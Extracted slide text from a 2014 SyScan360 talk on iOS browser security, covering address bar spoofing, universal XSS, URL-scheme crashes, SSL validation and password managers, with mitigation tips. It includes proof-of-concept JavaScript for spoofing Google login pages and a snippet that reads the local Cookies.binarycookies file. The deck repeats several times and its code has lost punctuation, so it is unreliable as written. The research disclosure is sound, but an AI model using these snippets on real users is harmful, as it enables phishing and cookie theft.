Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
SyScan360 2014
Mobile Browsers Security iOS
This presentation expresses our private opinions
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers not in these websites
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
This presentation expresses our private opinions
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers not in these websites
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
